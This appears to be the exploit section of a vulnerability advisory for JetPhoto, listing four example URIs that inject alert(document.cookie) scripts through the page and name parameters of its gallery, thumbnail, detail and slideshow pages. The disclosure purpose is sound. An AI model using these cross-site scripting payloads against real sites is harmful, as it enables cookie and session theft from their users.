• info
• discussion
• exploit
• solution
• references

JetPhoto Multiple Cross-Site Scripting Vulnerabilities


These issues can be exploited through a web client.

The following example URIs are available:

http://www.example.com/[path]/view/Classic.view/thumbnail.php?name=webalbum&page=<script>alert(document.cookie);</script>

http://www.example.com/[path]/view/Classic.view/gallery.php?name=JetPhoto_Album&page=<script>alert(document.cookie);</script>

http://www.example.com/[path]/view/Classic.view/detail.php?name=JetPhoto_Album&page=<script>alert(document.cookie);</script>

http://www.example.com/[path]/view/Orange.view/slideshow.php?name=<script></script><script>alert(document.cookie);</script>